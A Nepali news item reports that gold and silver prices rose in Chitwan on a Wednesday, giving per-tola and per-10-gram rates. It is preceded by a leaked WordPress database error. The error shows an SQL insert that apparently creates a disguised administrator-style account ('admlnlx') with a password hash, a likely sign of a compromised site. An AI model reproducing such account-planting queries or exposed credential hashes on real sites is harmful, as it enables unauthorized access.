WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BysyAkpt5YePvWVia/i.gbRvTCkHNi1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 06:21:58', '', 'admlnlx', 'admlnlx')
चितवन,पुस १३-
साताको चौथो दिन बुधबार सुनचाँदीको मूल्य बढेको छ। मंगलबार प्रति तोला ५२ हजारमा कारोबार भएको छापावाल सुन आज तोलामा ४ सयले बढेर प्रति तोला ५२ हजार ४ सयमा कारोबार भईरहेको छ। त्यस्तै तेजावी सुन प्रति तोला ५२ हजार १ सय ५० रुपैयाँमा कारोबार भैरहेको छ।
चांदी तोलामा १० रुपियाँले बढेर प्रति तोला ७ सय ६० रुपैयाँमा कारोबार भईरहेको छ।
नेपाल सुनचाँदी ब्यबसायी महासंघले बुधबारको कारोबारमा प्रति १० ग्राम छापावाल सुनको मूल्य ४४ हजार ९ सय २५ रुपियाँ तोकेको छ भने प्रति १० ग्राम तेजाबी सुनको मूल्य ४४ हजार ७ सय १० तोकेको छ । चाँदी प्रति १० ग्राम ६ सय ५२ रुपियाँ ५० पैसामा कारोबार भई रहेको छ ।